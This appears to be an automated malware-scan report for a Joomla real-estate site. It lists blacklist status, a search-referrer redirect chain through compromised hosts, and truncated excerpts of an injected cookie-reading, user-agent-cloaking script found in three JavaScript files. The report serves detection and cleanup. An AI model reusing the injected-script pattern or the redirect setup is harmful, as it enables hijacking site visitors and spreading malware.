Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=homes2own.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://homes2own.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://homes2own.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: homes2own.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 13 Oct 2014 09:22:37 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17-pl0-gentoo | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 13 Oct 2014 09:22:37 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.33 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://homes2own.ru/ | 200 OK Content-Length: 44039 Content-Type: text/html | clean |
http://homes2own.ru/media/plg_jblibrary/jquery/jquery-1.5.2.min.js | 200 OK Content-Length: 1124 Content-Type: application/x-javascript | clean |
http://homes2own.ru/plugins/system/jat3/base-themes/default/js/core.js | 200 OK Content-Length: 6877 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen el = $(el); if (!el || !el.getChildren() || !el.getChildren().length) return; el.getChildren ()[0].addClass ('first-item'); el.getChildren ()[el.getChildren ().length-1].addClass ('last-item'); } function $$_ (els) { if ($type(els)=='string') return $$(els); var els_ = []; els.each (function (el){ el = $(el); if (el) els_.push (el); }); return els_; };;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://homes2own.ru/plugins/system/jat3/base-themes/default/js/menu/mega.js | 200 OK Content-Length: 15603 Content-Type: application/x-javascript | clean |
http://homes2own.ru/media/system/js/caption.js | 200 OK Content-Length: 3118 Content-Type: application/x-javascript | clean |
http://homes2own.ru/modules/mod_coinslider/js/coin-slider.js | 200 OK Content-Length: 12814 Content-Type: application/x-javascript | clean |
http://homes2own.ru/components/com_ezrealty/library/slimbox/js/slimbox.js | 200 OK Content-Length: 8726 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen { if (obj.addEventListener) { obj.addEventListener(evType, fn, false); return (true); } else if (obj.attachEvent) { var r = obj.attachEvent("on"+evType, fn); return (r); } else return (false); } loadEvent(window, "load", Lightbox.init.bind(Lightbox)); } else { window.addEvent("domready", Lightbox.init.bind(Lightbox)); } ;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://homes2own.ru/includes/js/overlib_mini.js | 200 OK Content-Length: 37985 Content-Type: application/x-javascript | clean |
http://homes2own.ru/includes/js/joomla.javascript.js | 200 OK Content-Length: 16560 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen } if (pressbutton == 'go2menu') { form.menu.value = menu; submitform( pressbutton ); return; } if (pressbutton == 'go2menuitem') { form.menu.value = menu; form.menuid.value = id; submitform( pressbutton ); return; } } function isEmail( text ) { var pattern = "^[\\w-_\.]*[\\w-_\.]\@[\\w]\.+[\\w]+[\\w]$"; var regex = new RegExp( pattern ); return regex.test( text ); };;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://homes2own.ru/templates/jgroup/js/jquery.tipsy.js | 200 OK Content-Length: 5526 Content-Type: application/x-javascript | clean |
http://homes2own.ru//modules/mod_ezrealty_slideshow/js/image-slideshow.js/ | 404 Not Found Content-Length: 1106 Content-Type: text/html | clean |
http://homes2own.ru/test404page.js | 404 Not Found Content-Length: 1106 Content-Type: text/html | clean |